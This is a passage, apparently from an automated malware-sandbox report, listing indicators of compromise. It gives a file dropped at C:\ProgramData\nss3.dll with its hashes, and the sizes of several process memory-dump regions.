      fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

    • C:\ProgramData\nss3.dll

      Filesize

      2.0MB

      MD5

      1cc453cdf74f31e4d913ff9c10acdde2

      SHA1

      6e85eae544d6e965f15fa5c39700fa7202f3aafe

      SHA256

      ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

      SHA512

      dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

    • memory/844-1-0x0000000000400000-0x0000000000661000-memory.dmp

      Filesize

      2.4MB

    • memory/844-3-0x0000000000400000-0x0000000000661000-memory.dmp

      Filesize

      2.4MB

    • memory/844-4-0x0000000000400000-0x0000000000661000-memory.dmp

      Filesize

      2.4MB

    • memory/844-5-0x0000000061E00000-0x0000000061EF3000-memory.dmp

      Filesize

      972KB

    • memory/844-75-0x0000000000400000-0x0000000000661000-memory.dmp

      Filesize

      2.4MB

    • memory/844-76-0x0000000000400000-0x0000000000661000-memory.dmp

      Filesize

      2.4MB

    • memory/3320-0-0x000000000064A000-0x000000000064B000-memory.dmp

      Filesize

      4KB
